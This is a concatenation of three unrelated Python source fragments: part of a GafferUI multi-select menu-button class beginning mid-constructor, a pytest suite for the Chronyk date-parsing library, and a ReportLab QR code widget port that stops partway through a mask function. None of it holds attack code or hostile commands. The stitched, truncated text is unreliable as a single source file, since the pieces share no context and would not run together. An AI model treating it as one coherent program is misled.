GafferUI.MenuButton.__init__(
self,
menu = GafferUI.Menu( Gaffer.WeakMethod( self.__menuDefinition ) ),
**kw
)
self.__allowMultipleSelection = allowMultipleSelection
self.__allowEmptySelection = allowEmptySelection
self.__selectionChangedSignal = None
self.__menuLabels = []
self.__selectedLabels = []
self.__enabledLabels = []
self.__setDisplayName()
## A signal emitted whenever the selection changes.
def selectionChangedSignal( self ) :
if self.__selectionChangedSignal is None :
self.__selectionChangedSignal = GafferUI.WidgetSignal()
return self.__selectionChangedSignal
## Returns a list of the enabled labels.
def getEnabledItems( self ) :
self.__cleanUpList( self.__enabledLabels, self.__menuLabels ) # Ensure that the selected list is ordered properly.
return self.__enabledLabels
## Sets which items are enabled.
def setEnabledItems( self, labels ) :
input = self.__validateInput( labels )
self.__enabledLabels[:] = input
## Adds a list of items to the current selection.
def addSelection( self, labels ) :
# Remove items that are not in the menu and returns a list.
input = self.__validateInput( labels )
if self.__allowMultipleSelection :
for label in labels :
if not label in self.__selectedLabels :
self.__selectedLabels.append( label )
self.__selectionChanged()
else :
if len( labels ) > 1 :
raise RuntimeError("Parameter must be single item or a list with one element.")
# Remove all selected labels that are not in the menu, emit signals if necessary and update the button.
self.__validateState()
## Returns a list of the selected labels.
def getSelection( self ) :
self.__cleanUpList( self.__selectedLabels, self.__menuLabels ) # Ensure that the selected list is ordered properly.
return self.__selectedLabels
## Sets which items are selected.
# If a list is provided then the current selection is replaced with the valid elements within the list.
# If a single element is provided then it is appended to the current selection unless multiple selections
# are not enabled in which case the selection is replaced.
def setSelection( self, labels ) :
input = self.__validateInput( labels )
if len( input ) == 0 and not self.__allowEmptySelection :
return
if self.__allowMultipleSelection :
self.__selectedLabels[:] = input
self.__selectionChanged()
else :
if len( input ) > 1 :
raise RuntimeError("Parameter must be single item or a list with one element.")
else :
self.__selectedLabels[:] = input
self.__selectionChanged()
# Remove all selected labels that are not in the menu, emit signals if necessary and update the button.
self.__validateState()
def index( self, item ) :
return self.__menuLabels.index( item )
# Append a new item or list of items to the menu.
def append( self, labels ) :
if isinstance( labels, list ) :
for label in labels :
if not label in self.__menuLabels :
self.__menuLabels.append( label )
self.__enabledLabels.append( label )
else :
if not labels in self.__menuLabels :
self.__menuLabels.append( labels )
self.__enabledLabels.append( labels )
def remove( self, label ) :
if label in self.__menuLabels :
self.__menuLabels.remove(label)
self.__validateState()
def insert( self, index, label ) :
if not label in self.__menuLabels :
self.__menuLabels.insert( index, label )
self.__enabledLabels.insert( index, label )
##############################################
# Private Methods
#############################################
def __validateInput( self, labels ) :
if isinstance( labels, list ) :
validInput = labels
elif isinstance( labels, str) :
validInput = [ labels ]
else :
validInput = list( labels )
self.__cleanUpList( validInput, self.__menuLabels )
return validInput
## The slot which is called when an item is clicked on.
def __selectClicked( self, label, selected=None ) :
if self.__allowMultipleSelection :
if selected == True :
self.addSelection( label )
else :
if not self.__allowEmptySelection :
if len( self.__selectedLabels ) > 1 :
self.__selectedLabels.remove( label )
self.__selectionChanged()
else :
self.__selectedLabels.remove( label )
self.__selectionChanged()
else :
# Check the mode that we are in. If we are not required to have a selection
# then if we already have the label selected we can remove it.
if label in self.__selectedLabels and self.__allowEmptySelection :
self.__selectedLabels = []
self.__validateState()
self.__selectionChanged()
else :
self.setSelection( label )
## Updates the button's text and emits the selectionChangedSignal.
def __selectionChanged( self ) :
self.__setDisplayName()
self.selectionChangedSignal()( self )
def __menuDefinition( self ) :
m = IECore.MenuDefinition()
for label in self.__menuLabels :
menuPath = label
if not menuPath.startswith( "/" ):
menuPath = "/" + menuPath
m.append(
menuPath,
{
"command" : functools.partial( Gaffer.WeakMethod( self.__selectClicked ), label ),
"active" : label in self.__enabledLabels,
"checkBox" : ( ( self.__allowMultipleSelection ) or ( not self.__allowMultipleSelection and self.__allowEmptySelection ) ) and label in self.__selectedLabels
}
)
return m
## Checks to see if the internal lists are up-to-date and ordered correctly.
# If a label has been found to be removed and it was selected then the selectionChanged signal is emitted
# and the name of the button also changed.
def __validateState( self ) :
# Remove duplicates from the list whist preserving it's order.
seen = set()
seen_add = seen.add
self.__menuLabels[:] = [ x for x in self.__menuLabels if x not in seen and not seen_add(x)]
# Now we check that the enabled and selected lists are in order and without duplicates. If duplicates are
# found or their entry does not exist within self.__menuLabels then they are removed and the relevant signals emitted.
if self.__cleanUpList( self.__selectedLabels, self.__menuLabels ) :
self.__selectionChanged()
self.__cleanUpList( self.__enabledLabels , self.__menuLabels )
# If we don't allow multiple selection then make sure that at least one item is selected!
if not self.__allowEmptySelection and len( self.__selectedLabels ) == 0 :
if len( self.__enabledLabels ) > 0 :
self.__selectedLabels.append( self.__enabledLabels[0] )
elif len( self.__menuLabels ) > 0 :
self.__selectedLabels.append( self.__menuLabels[0] )
self.__selectionChanged()
## A simple method to make sure that the passed list only holds
# elements that l2 does. It also orders the elements and ensures
# that there are no duplicate entries.
# Returns True if the list was changed.
def __cleanUpList( self, l, l2 ) :
oldLength = len(l)
seen = set()
seen_add = seen.add
l[:] = [ x for x in l2 if x not in seen and not seen_add(x) and x in l ]
return len(l) != oldLength
def __contains__( self, label ):
return label in self.__menuLabels
def __len__( self ) :
return len( self.__menuLabels )
def __delitem__( self, index ) :
if isinstance( index, slice ) :
del self.__menuLabels[index]
self.__validateState()
else :
label = self.__menuLabels[index]
self.remove(label)
self.__validateState()
def __setitem__( self, index, value ) :
if isinstance( index, slice ) :
s = list( value[index.start:index.stop] )
self.__menuLabels[index.start:index.stop] = s
self.__enabledLabels = self.__enabledLabels + s
self.__validateState()
else :
if value not in self.__menuLabels :
self.__menuLabels[index] = value
self.__enabledLabels.append( value )
self.__validateState()
def __repr__( self ) :
return self.__menuLabels.__repr__()
def __getitem__( self, index ) :
return self.__menuLabels[index]
def __setDisplayName( self ) :
name = "..."
nEntries = len( self.__menuLabels )
nSelected = len( self.__selectedLabels )
if nEntries == 0 :
name = "None"
elif nSelected == 0 :
name = "None"
elif nSelected == 1 :
name = self.getSelection()[0]
elif nSelected == nEntries :
name = "All"
self.setText( name )
|
|
#!/usr/bin/env python3
import pytest
import sys
import time
import calendar
import datetime
from chronyk import LOCALTZ, Chronyk, ChronykDelta, currentutc, guesstype, DateRangeError
def isEqual(time1, time2):
return abs(time1 - time2) < 0.1
###############################################################################
def test_currentutc():
currentutc()
def test_guesstype():
assert guesstype(9001) == Chronyk(9001)
assert guesstype("2 hours ago").relativestring() == Chronyk("2 hours ago").relativestring()
assert guesstype("2 hours") == ChronykDelta("2 hours")
def test_empty_con():
assert isEqual(Chronyk().timestamp(), time.time())
def test_none_con():
assert isEqual(Chronyk(None).timestamp(), Chronyk(time.time()).timestamp())
def test_common_strings():
c1 = Chronyk("today").relativestring()
c2 = Chronyk("now").relativestring()
c3 = Chronyk("this week").relativestring()
c4 = Chronyk("this month").relativestring()
c5 = Chronyk("this day").relativestring()
assert c1 == c2 and c2 == c3 and c3 == c4 and c4 == c5
def test_yesterday():
assert Chronyk("yesterday").relativestring() == "yesterday"
def test_yesteryear():
assert Chronyk("yesteryear").relativestring() == Chronyk("1 year ago").relativestring()
# TEST PRE-EPOCH DATES
def test_pre_epoch_1():
assert Chronyk(datetime.datetime(1950, 1, 1)).datetime() == datetime.datetime(1950, 1, 1)
def test_pre_epoch_2():
assert Chronyk(time.strptime("1950 01 01", "%Y %m %d")).timestring("%Y %m %d") == "1950 01 01"
# ABSOLUTE STRINGS
def test_absolute_iso():
t = Chronyk("2014-09-18 11:24:47")
assert t.ctime() == "Thu Sep 18 11:24:47 2014"
def test_absolute_iso_date():
t = Chronyk("2014-09-18")
assert t.ctime() == "Thu Sep 18 00:00:00 2014"
def test_absolute_written_1():
t = Chronyk("May 2nd, 2015")
assert t.ctime() == "Sat May 2 00:00:00 2015"
def test_absolute_written_2():
t = Chronyk("2. August 2010")
assert t.ctime() == "Mon Aug 2 00:00:00 2010"
def test_absolute_12hr():
t = Chronyk("11:14 am")
assert t.ctime()[11:-5] == "11:14:00"
def test_absolute_12hr_seconds():
t = Chronyk("11:14:32 am")
assert t.ctime()[11:-5] == "11:14:32"
def test_absolute_24hr():
t = Chronyk("17:14")
assert t.ctime()[11:-5] == "17:14:00"
def test_absolute_24hr_seconds():
t = Chronyk("17:14:32")
assert t.ctime()[11:-5] == "17:14:32"
def test_absolute_value():
with pytest.raises(ValueError):
Chronyk("warglblargl")
# RELATIVE STRINGS
def test_relative_now():
assert Chronyk().relativestring() == "just now"
def test_relative_seconds_1():
assert Chronyk("2 seconds ago").relativestring() == "just now"
def test_relative_seconds_2():
assert Chronyk("in 5 seconds").relativestring() == "just now"
def test_relative_seconds_3():
timest = time.time()
assert Chronyk(timest - 5).relativestring(now=timest, minimum=0) == "5 seconds ago"
def test_relative_minutes_1():
assert Chronyk("1 minute ago").relativestring() == "1 minute ago"
def test_relative_minutes_2():
assert Chronyk("in 2 minutes").relativestring() == "in 2 minutes"
def test_relative_hours_1():
assert Chronyk("1 hour ago").relativestring() == "1 hour ago"
def test_relative_hours_2():
assert Chronyk("in 2 hours").relativestring() == "in 2 hours"
def test_relative_days_1():
assert Chronyk("10 days ago").relativestring() == "10 days ago"
def test_relative_days_2():
assert Chronyk("in 20 days").relativestring() == "in 20 days"
def test_relative_weeks_1():
assert Chronyk("1 week ago").relativestring() == "7 days ago"
def test_relative_weeks_2():
assert Chronyk("in 2 weeks").relativestring() == "in 14 days"
def test_relative_weeks_3():
assert Chronyk("in blurgh weeks and 2 days").relativestring() == "in 2 days"
def test_relative_months_1():
assert Chronyk("overninethousand months and 2 days ago").relativestring() == "2 days ago"
def test_relative_months_2():
dati = datetime.datetime.utcnow()
newmonth = (((dati.month - 1) + 4) % 12) + 1
newyear = dati.year + int(((dati.month - 1) + 4) / 12)
newday = dati.day
while newday > calendar.monthrange(newyear, newmonth)[1]:
newday -= 1
dati = dati.replace(year=newyear, month=newmonth, day=newday)
timestr = time.strftime("%Y-%m-%d", dati.timetuple())
assert Chronyk("in 4 months", timezone=0).relativestring() == timestr
def test_relative_years_1():
assert Chronyk("something years and 2 days ago").relativestring() == "2 days ago"
def test_relative_years_2():
dati = datetime.datetime.utcnow()
dati = dati.replace(year=dati.year - 2)
timestr = time.strftime("%Y-%m-%d", dati.timetuple())
assert Chronyk("2 years ago").relativestring() == timestr
def test_struct():
timestr = time.localtime()
assert Chronyk(timestr).timestamp() == time.mktime(timestr)
def test_valid_1():
Chronyk("2 hours ago", allowfuture=False, allowpast=True)
def test_valid_2():
Chronyk("in 2 hours", allowfuture=True, allowpast=False)
def test_valid_3():
with pytest.raises(DateRangeError):
Chronyk("2 hours ago", allowpast=False)
def test_valid_4():
with pytest.raises(DateRangeError):
Chronyk("in 2 hours", allowfuture=False)
def test_typeerror():
with pytest.raises(TypeError):
Chronyk(["this", "should", "throw", "TypeError"])
def test_datetime():
timest = currentutc()
assert Chronyk(timest, timezone=0).datetime() == datetime.datetime.fromtimestamp(timest)
def test_date():
timest = currentutc()
assert Chronyk(timest, timezone=0).date() == datetime.date.fromtimestamp(timest)
def test_timest_1():
timest = time.time()
assert Chronyk(timest).timestamp() == timest
def test_timest_2():
timest = time.time()
assert Chronyk(timest, timezone=0).timestamp(timezone=-7200) == timest + 7200
def test_timest_3():
timest = time.time()
assert Chronyk(timest, timezone=-7200).timestamp(timezone=0) == timest - 7200
def test_timestring_1():
timest = time.time()
assert Chronyk(timest).timestring() == time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(timest - LOCALTZ))
def test_timestring_2():
timest = time.time()
assert Chronyk(timest).timestring("%Y-%m-%d") == time.strftime("%Y-%m-%d", time.gmtime(timest - LOCALTZ))
def test_operators_eq():
timest = time.time()
assert Chronyk(timest) - 5 == Chronyk(timest - 5) and Chronyk(timest, timezone=0) == timest
def test_operators_str():
t = Chronyk()
assert str(t) == t.timestring()
def test_operators_num():
timest = time.time()
t = Chronyk(timest, timezone=0)
assert int(timest) == int(t) and int(t) == int(float(t))
def test_operators_ne():
timest = time.time()
assert Chronyk(timest) != Chronyk(timest - 2)
def test_operators_ltgt():
timest = time.time()
assert Chronyk(timest) > Chronyk(timest - 5)
assert Chronyk(timest, timezone=0) > timest - 5
assert Chronyk(timest) < Chronyk(timest + 5)
assert Chronyk(timest, timezone=0) < timest + 5
assert Chronyk(timest) <= Chronyk(timest)
assert Chronyk(timest, timezone=0) <= timest
assert Chronyk(timest) >= Chronyk(timest - 5)
assert Chronyk(timest, timezone=0) >= timest - 5
def test_operators_add():
timest = time.time()
assert Chronyk(timest) + ChronykDelta(5) == Chronyk(timest + 5)
assert Chronyk(timest) + 5 == Chronyk(timest + 5)
def test_operators_sub():
timest = time.time()
assert Chronyk(timest) - Chronyk(timest - 5) == ChronykDelta(5)
assert Chronyk(timest) - ChronykDelta(5) == Chronyk(timest - 5)
assert Chronyk(timest, timezone=0) - 5 == timest - 5
def test_delta_type():
with pytest.raises(TypeError):
ChronykDelta(["WEEE", "EEEEE", "EEEEEE"])
def test_delta_timestring_1():
assert ChronykDelta("5 hours").timestring() == "5 hours"
def test_delta_timestring_2():
assert ChronykDelta("1 week").timestring() == "7 days"
def test_delta_timestring_3():
assert ChronykDelta("1 hour").timestring() == "1 hour"
def test_delta_timestring_4():
assert ChronykDelta("1 day and 12 hours").timestring() == "1 day and 12 hours"
def test_delta_timestring_5():
assert ChronykDelta("1 day and 12 hours").timestring(maxunits=1) == "1 day"
def test_delta_timestring_6():
with pytest.raises(ValueError):
ChronykDelta("1 day ago").timestring(maxunits=0)
def test_delta_timestring_7():
assert ChronykDelta(0).timestring() == ""
def test_delta_operators_str():
assert ChronykDelta(5).timestring() == str(ChronykDelta(5))
def test_delta_operators_num():
assert 5 == int(ChronykDelta(5)) and int(ChronykDelta(5)) == float(ChronykDelta(5))
def test_delta_operators_eq():
assert ChronykDelta(5) == ChronykDelta(5) and ChronykDelta(5) == 5
def test_delta_operators_neq():
assert ChronykDelta(5) != ChronykDelta(6) and ChronykDelta(5) != 3
def test_delta_operators_ltgt():
assert ChronykDelta(5) > ChronykDelta(4) and ChronykDelta(5) > 3
assert ChronykDelta(5) < ChronykDelta(7) and ChronykDelta(5) < 9
assert ChronykDelta(5) >= ChronykDelta(5) and ChronykDelta(5) >= 3
assert ChronykDelta(5) <= 5 and ChronykDelta(5) <= ChronykDelta(6)
def test_delta_operators_add():
timest = time.time()
assert ChronykDelta(5) + ChronykDelta(-5) == 0
assert ChronykDelta(5) + Chronyk(timest) == Chronyk(timest + 5)
assert ChronykDelta(5) + 10 == 15
def test_delta_operators_sub():
assert ChronykDelta(5) - 5 == 0
assert ChronykDelta(5) - ChronykDelta(1) == 4
def test_delta_operators_mul():
assert ChronykDelta(12) * 2 == 24
def test_delta_operators_div():
assert ChronykDelta(10) / 2 == 5
if __name__ == "__main__":
sys.exit(pytest.main())
|
|
# QRCode for Python
#
# Ported from the Javascript library by Sam Curren
# ReportLab module by German M. Bravo
#
# QRCode for Javascript
# http://d-project.googlecode.com/svn/trunk/misc/qrcode/js/qrcode.js
#
# Copyright (c) 2009 Kazuhiko Arase
#
# URL: http://www.d-project.com/
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
# The word "QR Code" is registered trademark of
# DENSO WAVE INCORPORATED
# http://www.denso-wave.com/qrcode/faqpatent-e.html
__all__=(
'QrCodeWidget',
)
import math, re
from reportlab.graphics.shapes import Group, Rect
from reportlab.lib import colors
from reportlab.lib.validators import isNumber, isColor, isString, Validator
from reportlab.lib.attrmap import *
from reportlab.graphics.charts.areas import PlotArea
from reportlab.lib.units import mm
class isLevel(Validator):
def test(self,x):
# level L : About 7% or less errors can be corrected.
# level M : About 15% or less errors can be corrected.
# level Q : About 25% or less errors can be corrected.
# level H : About 30% or less errors can be corrected.
return type(x) is str and len(x)==1 and x in ['L', 'M', 'Q', 'H']
isLevel = isLevel()
class QrCodeWidget(PlotArea):
codeName = "QR"
_attrMap = AttrMap(BASE=PlotArea,
value = AttrMapValue(isString, desc='the text'),
x = AttrMapValue(isNumber, desc='x-coord'),
y = AttrMapValue(isNumber, desc='y-coord'),
barFillColor = AttrMapValue(isColor, desc='bar color'),
barWidth = AttrMapValue(isNumber, desc='Width of bars.'), # maybe should be named just width?
barHeight = AttrMapValue(isNumber, desc='Height of bars.'), # maybe should be named just height?
barStrokeWidth = AttrMapValue(isNumber, desc='Width of bar borders.'), # maybe removed?
barStrokeColor = AttrMapValue(isColor, desc='Color of bar borders.'), # maybe removed?
barBorder = AttrMapValue(isNumber, desc='Width of QR border.'), # maybe should be named qrBorder?
barLevel = AttrMapValue(isLevel, desc='QR Code level.'), # maybe should be named qrLevel
)
x = 0
y = 0
barFillColor = colors.black
barStrokeColor = None
barStrokeWidth = 0
barHeight = 32*mm
barWidth = 32*mm
barBorder = 4
barLevel = 'L'
def __init__(self,value='Hello World',**kw):
self.value=value
for k, v in kw.items():
setattr(self, k, v)
def wrap(self,aW,aH):
return self.width,self.height
def draw(self):
g = Group()
gAdd = g.add
barWidth = self.barWidth
barHeight = self.barHeight
x = self.x
y = self.y
gAdd(Rect(x,y,barWidth,barHeight,fillColor=None,strokeColor=None,strokeWidth=0))
barFillColor = self.barFillColor
barStrokeWidth = self.barStrokeWidth
barStrokeColor = self.barStrokeColor
barBorder = self.barBorder
correctLevel = {
'L': QRErrorCorrectLevel.L,
'M': QRErrorCorrectLevel.M,
'Q': QRErrorCorrectLevel.Q,
'H': QRErrorCorrectLevel.H,
}[self.barLevel]
qr = QRCode(None, correctLevel)
qr.addData(self.value)
qr.make()
moduleCount = qr.getModuleCount()
boxsize = min(barWidth, barHeight) / (moduleCount + barBorder * 2)
offsetX = (barWidth - min(barWidth, barHeight)) / 2
offsetY = (min(barWidth, barHeight) - barHeight) / 2
for r in range(moduleCount):
for c in range(moduleCount):
if (qr.isDark(r, c) ):
x = (c + barBorder) * boxsize
y = (r + barBorder+1) * boxsize
qrect = Rect(offsetX+x,offsetY+barHeight-y,boxsize,boxsize,fillColor=barFillColor,strokeWidth=barStrokeWidth,strokeColor=barStrokeColor)
gAdd(qrect)
return g
class QRMode:
MODE_NUMBER = 1 << 0
MODE_ALPHA_NUM = 1 << 1
MODE_8BIT_BYTE = 1 << 2
MODE_KANJI = 1 << 3
class QR:
def __init__(self, data):
if self.valid:
if not re.search('^[%s]+$' % self.valid, data):
raise ValueError
else:
self.valid = ''.join(chr(c) for c in range(256))
self.data = data
def getLength(self):
return len(self.data)
def __repr__(self):
return self.data
def write(self, buffer):
for g in map(None, *[iter(self.data)] * self.group):
bits = 0
n = 0
for i in range(self.group):
if g[i] is not None:
n *= len(self.valid)
n += self.valid.index(g[i])
bits += self.bits[i]
buffer.put(n, bits)
class QRNumber(QR):
valid = '0123456789'
bits = (4,3,3)
group = 3
mode = QRMode.MODE_NUMBER
class QRAlphaNum(QR):
valid = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ $%*+-./:'
bits = (6,5)
group = 2
mode = QRMode.MODE_ALPHA_NUM
class QR8bitByte(QR):
valid = None #''.join(chr(c) for c in range(256))
bits = (8,)
group = 1
mode = QRMode.MODE_8BIT_BYTE
def write(self, buffer):
for c in self.data:
buffer.put(ord(c), 8)
class QRKanji(QR):
valid = None
bits = (8,)
group = 1
mode = QRMode.MODE_KANJI
class QRCode:
def __init__(self, typeNumber, errorCorrectLevel):
self.typeNumber = typeNumber
self.errorCorrectLevel = errorCorrectLevel
self.modules = None
self.moduleCount = 0
self.dataCache = None
self.dataList = []
def addData(self, data):
try :
newData = QRNumber(data)
except ValueError:
try:
newData = QRAlphaNum(data)
except ValueError:
try:
newData = QR8bitByte(data)
except ValueError:
try:
newData = QRKanji(data)
except:
raise
self.dataList.append(newData)
self.dataCache = None
def isDark(self, row, col):
if (row < 0 or self.moduleCount <= row or col < 0 or self.moduleCount <= col):
raise Exception("%s,%s - %s" % (row, col, self.moduleCount))
return self.modules[row][col]
def getModuleCount(self):
return self.moduleCount
def make(self):
if self.typeNumber is None:
# Calculate typeNumber for data to fit the QR Code capacity
errorCorrectLevel = self.errorCorrectLevel
for typeNumber in range(1, 40):
rsBlocks = QRRSBlock.getRSBlocks(typeNumber, errorCorrectLevel)
totalDataCount = 0;
for i in range(len(rsBlocks)):
totalDataCount += rsBlocks[i].dataCount
length = 0
for i in range(len(self.dataList)):
data = self.dataList[i]
length += 4
length += QRUtil.getLengthInBits(data.mode, typeNumber)
length += len(data.data) * 8
if length <= totalDataCount * 8:
break
self.typeNumber = typeNumber
self.makeImpl(False, self.getBestMaskPattern())
def makeImpl(self, test, maskPattern):
self.moduleCount = self.typeNumber * 4 + 17
self.modules = [None for x in range(self.moduleCount)]
for row in range(self.moduleCount):
self.modules[row] = [None for x in range(self.moduleCount)]
for col in range(self.moduleCount):
self.modules[row][col] = None #(col + row) % 3;
self.setupPositionProbePattern(0, 0)
self.setupPositionProbePattern(self.moduleCount - 7, 0)
self.setupPositionProbePattern(0, self.moduleCount - 7)
self.setupPositionAdjustPattern()
self.setupTimingPattern()
self.setupTypeInfo(test, maskPattern)
if (self.typeNumber >= 7):
self.setupTypeNumber(test)
if (self.dataCache == None):
self.dataCache = QRCode.createData(self.typeNumber, self.errorCorrectLevel, self.dataList)
self.mapData(self.dataCache, maskPattern)
def setupPositionProbePattern(self, row, col):
for r in range(-1, 8):
if (row + r <= -1 or self.moduleCount <= row + r): continue
for c in range(-1, 8):
if (col + c <= -1 or self.moduleCount <= col + c): continue
if ( (0 <= r and r <= 6 and (c == 0 or c == 6) )
or (0 <= c and c <= 6 and (r == 0 or r == 6) )
or (2 <= r and r <= 4 and 2 <= c and c <= 4) ):
self.modules[row + r][col + c] = True;
else:
self.modules[row + r][col + c] = False;
def getBestMaskPattern(self):
minLostPoint = 0
pattern = 0
for i in range(8):
self.makeImpl(True, i);
lostPoint = QRUtil.getLostPoint(self);
if (i == 0 or minLostPoint > lostPoint):
minLostPoint = lostPoint
pattern = i
return pattern
def setupTimingPattern(self):
for r in range(8, self.moduleCount - 8):
if (self.modules[r][6] != None):
continue
self.modules[r][6] = (r % 2 == 0)
for c in range(8, self.moduleCount - 8):
if (self.modules[6][c] != None):
continue
self.modules[6][c] = (c % 2 == 0)
def setupPositionAdjustPattern(self):
pos = QRUtil.getPatternPosition(self.typeNumber)
for i in range(len(pos)):
for j in range(len(pos)):
row = pos[i]
col = pos[j]
if (self.modules[row][col] != None):
continue
for r in range(-2, 3):
for c in range(-2, 3):
if (r == -2 or r == 2 or c == -2 or c == 2 or (r == 0 and c == 0) ):
self.modules[row + r][col + c] = True
else:
self.modules[row + r][col + c] = False
def setupTypeNumber(self, test):
bits = QRUtil.getBCHTypeNumber(self.typeNumber)
for i in range(18):
mod = (not test and ( (bits >> i) & 1) == 1)
self.modules[i // 3][i % 3 + self.moduleCount - 8 - 3] = mod;
for i in range(18):
mod = (not test and ( (bits >> i) & 1) == 1)
self.modules[i % 3 + self.moduleCount - 8 - 3][i // 3] = mod;
def setupTypeInfo(self, test, maskPattern):
data = (self.errorCorrectLevel << 3) | maskPattern
bits = QRUtil.getBCHTypeInfo(data)
# vertical
for i in range(15):
mod = (not test and ( (bits >> i) & 1) == 1)
if (i < 6):
self.modules[i][8] = mod
elif (i < 8):
self.modules[i + 1][8] = mod
else:
self.modules[self.moduleCount - 15 + i][8] = mod
# horizontal
for i in range(15):
mod = (not test and ( (bits >> i) & 1) == 1);
if (i < 8):
self.modules[8][self.moduleCount - i - 1] = mod
elif (i < 9):
self.modules[8][15 - i - 1 + 1] = mod
else:
self.modules[8][15 - i - 1] = mod
# fixed module
self.modules[self.moduleCount - 8][8] = (not test)
def mapData(self, data, maskPattern):
inc = -1
row = self.moduleCount - 1
bitIndex = 7
byteIndex = 0
for col in range(self.moduleCount - 1, 0, -2):
if (col == 6): col-=1
while (True):
for c in range(2):
if (self.modules[row][col - c] == None):
dark = False
if (byteIndex < len(data)):
dark = ( ( (data[byteIndex] >> bitIndex) & 1) == 1)
mask = QRUtil.getMask(maskPattern, row, col - c)
if (mask):
dark = not dark
self.modules[row][col - c] = dark
bitIndex-=1
if (bitIndex == -1):
byteIndex+=1
bitIndex = 7
row += inc
if (row < 0 or self.moduleCount <= row):
row -= inc
inc = -inc
break
PAD0 = 0xEC
PAD1 = 0x11
@staticmethod
def createData(typeNumber, errorCorrectLevel, dataList):
rsBlocks = QRRSBlock.getRSBlocks(typeNumber, errorCorrectLevel)
buffer = QRBitBuffer();
for i in range(len(dataList)):
data = dataList[i]
buffer.put(data.mode, 4)
buffer.put(data.getLength(), QRUtil.getLengthInBits(data.mode, typeNumber) )
data.write(buffer)
# calc num max data.
totalDataCount = 0;
for i in range(len(rsBlocks)):
totalDataCount += rsBlocks[i].dataCount
if (buffer.getLengthInBits() > totalDataCount * 8):
raise Exception("code length overflow. (%d > %d)" % (buffer.getLengthInBits(), totalDataCount * 8))
# end code
if (buffer.getLengthInBits() + 4 <= totalDataCount * 8):
buffer.put(0, 4)
# padding
while (buffer.getLengthInBits() % 8 != 0):
buffer.putBit(False)
# padding
while (True):
if (buffer.getLengthInBits() >= totalDataCount * 8):
break
buffer.put(QRCode.PAD0, 8)
if (buffer.getLengthInBits() >= totalDataCount * 8):
break
buffer.put(QRCode.PAD1, 8)
return QRCode.createBytes(buffer, rsBlocks)
@staticmethod
def createBytes(buffer, rsBlocks):
offset = 0
maxDcCount = 0
maxEcCount = 0
dcdata = [0 for x in range(len(rsBlocks))]
ecdata = [0 for x in range(len(rsBlocks))]
for r in range(len(rsBlocks)):
dcCount = rsBlocks[r].dataCount
ecCount = rsBlocks[r].totalCount - dcCount
maxDcCount = max(maxDcCount, dcCount)
maxEcCount = max(maxEcCount, ecCount)
dcdata[r] = [0 for x in range(dcCount)]
for i in range(len(dcdata[r])):
dcdata[r][i] = 0xff & buffer.buffer[i + offset]
offset += dcCount
rsPoly = QRUtil.getErrorCorrectPolynomial(ecCount)
rawPoly = QRPolynomial(dcdata[r], rsPoly.getLength() - 1)
modPoly = rawPoly.mod(rsPoly)
ecdata[r] = [0 for x in range(rsPoly.getLength()-1)]
for i in range(len(ecdata[r])):
modIndex = i + modPoly.getLength() - len(ecdata[r])
if (modIndex >= 0):
ecdata[r][i] = modPoly.get(modIndex)
else:
ecdata[r][i] = 0
totalCodeCount = 0
for i in range(len(rsBlocks)):
totalCodeCount += rsBlocks[i].totalCount
data = [None for x in range(totalCodeCount)]
index = 0
for i in range(maxDcCount):
for r in range(len(rsBlocks)):
if (i < len(dcdata[r])):
data[index] = dcdata[r][i]
index+=1
for i in range(maxEcCount):
for r in range(len(rsBlocks)):
if (i < len(ecdata[r])):
data[index] = ecdata[r][i]
index+=1
return data
class QRErrorCorrectLevel:
L = 1
M = 0
Q = 3
H = 2
class QRMaskPattern:
PATTERN000 = 0
PATTERN001 = 1
PATTERN010 = 2
PATTERN011 = 3
PATTERN100 = 4
PATTERN101 = 5
PATTERN110 = 6
PATTERN111 = 7
class QRUtil(object):
PATTERN_POSITION_TABLE = [
[],
[6, 18],
[6, 22],
[6, 26],
[6, 30],
[6, 34],
[6, 22, 38],
[6, 24, 42],
[6, 26, 46],
[6, 28, 50],
[6, 30, 54],
[6, 32, 58],
[6, 34, 62],
[6, 26, 46, 66],
[6, 26, 48, 70],
[6, 26, 50, 74],
[6, 30, 54, 78],
[6, 30, 56, 82],
[6, 30, 58, 86],
[6, 34, 62, 90],
[6, 28, 50, 72, 94],
[6, 26, 50, 74, 98],
[6, 30, 54, 78, 102],
[6, 28, 54, 80, 106],
[6, 32, 58, 84, 110],
[6, 30, 58, 86, 114],
[6, 34, 62, 90, 118],
[6, 26, 50, 74, 98, 122],
[6, 30, 54, 78, 102, 126],
[6, 26, 52, 78, 104, 130],
[6, 30, 56, 82, 108, 134],
[6, 34, 60, 86, 112, 138],
[6, 30, 58, 86, 114, 142],
[6, 34, 62, 90, 118, 146],
[6, 30, 54, 78, 102, 126, 150],
[6, 24, 50, 76, 102, 128, 154],
[6, 28, 54, 80, 106, 132, 158],
[6, 32, 58, 84, 110, 136, 162],
[6, 26, 54, 82, 110, 138, 166],
[6, 30, 58, 86, 114, 142, 170]
]
G15 = (1 << 10) | (1 << 8) | (1 << 5) | (1 << 4) | (1 << 2) | (1 << 1) | (1 << 0)
G18 = (1 << 12) | (1 << 11) | (1 << 10) | (1 << 9) | (1 << 8) | (1 << 5) | (1 << 2) | (1 << 0)
G15_MASK = (1 << 14) | (1 << 12) | (1 << 10) | (1 << 4) | (1 << 1)
@staticmethod
def getBCHTypeInfo(data):
d = data << 10;
while (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G15) >= 0):
d ^= (QRUtil.G15 << (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G15) ) )
return ( (data << 10) | d) ^ QRUtil.G15_MASK
@staticmethod
def getBCHTypeNumber(data):
d = data << 12;
while (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G18) >= 0):
d ^= (QRUtil.G18 << (QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G18) ) )
return (data << 12) | d
@staticmethod
def getBCHDigit(data):
digit = 0;
while (data != 0):
digit += 1
data >>= 1
return digit
@staticmethod
def getPatternPosition(typeNumber):
return QRUtil.PATTERN_POSITION_TABLE[typeNumber - 1]
@staticmethod
def getMask(maskPattern, i, j):
if maskPattern == QRMaskPattern.PATTERN000 : return (i + j) % 2 == 0
if maskPattern == QRMaskPattern.PATTERN001 : return i % 2 == 0
if maskPattern == QRMaskPattern.PATTERN010 : return j % 3 == 0
if maskPattern == QRMaskPattern.PATTERN011 : return (i + j) % 3 == 0
